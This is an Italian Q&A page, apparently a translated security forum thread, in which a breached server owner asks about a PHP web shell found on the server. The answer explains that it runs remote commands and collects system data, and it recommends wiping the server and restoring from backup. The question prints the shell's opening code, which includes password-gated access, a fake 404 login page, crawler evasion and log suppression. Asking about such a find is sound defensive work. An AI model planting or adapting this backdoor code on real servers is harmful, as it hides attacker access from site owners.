vulnerabilità nel server a causa dello script c99madshell [duplicato]

-1

Qualcuno ha ottenuto l'accesso completo al mio server caricando un file php ed eseguendo una shell dal file. Ho cercato e ho scoperto che poteva essere uno script c99madshell.

I frammenti di codice del file assomigliano a:

$auth_pass = "f727df897cbcceea7022d3c8ec66ae29";  
$color = "#df5";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('display_errors',0);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', 'Ver 2.0');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    echo '<title>404 Not Found</title>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
          <style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
          <form method=post><input type=password name=pass></form>';
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';

Di seguito è riportato il link del file completo. link

Qualcuno può aiutarmi a capire quale tipo di attacco è, quali minacce possiede e quali rimedi? Penso che questo sia un tipo particolare di attacco già affrontato da molti. Gradirei molto se qualcuno potesse indicarmi la direzione per risolvere questo caso particolare. Grazie

    
posta user3929745 06.12.2016 - 12:27
fonte

1 risposta

2

Sembra che questo file sia stato caricato sul tuo server, presumibilmente attraverso un sito Web che il server sta ospitando. Puoi controllare i log di accesso dei tuoi server web se vuoi essere sicuro.

Lo script stesso viene utilizzato per eseguire comandi da remoto e anche per recuperare informazioni generali sul sistema. TUTTE le informazioni: software installato, utenti, gruppi, uid corrente, spazio su disco, il tuo nome. Sembra che una volta che sei stato autenticato, hai anche accesso ad una sorta di pannello di controllo.

Per quanto riguarda i rimedi; una volta che hanno accesso al tuo sistema, sarebbe saggio semplicemente cancellarlo e ripristinare un backup.

    
risposta data 06.12.2016 - 14:51
fonte

Leggi altre domande sui tag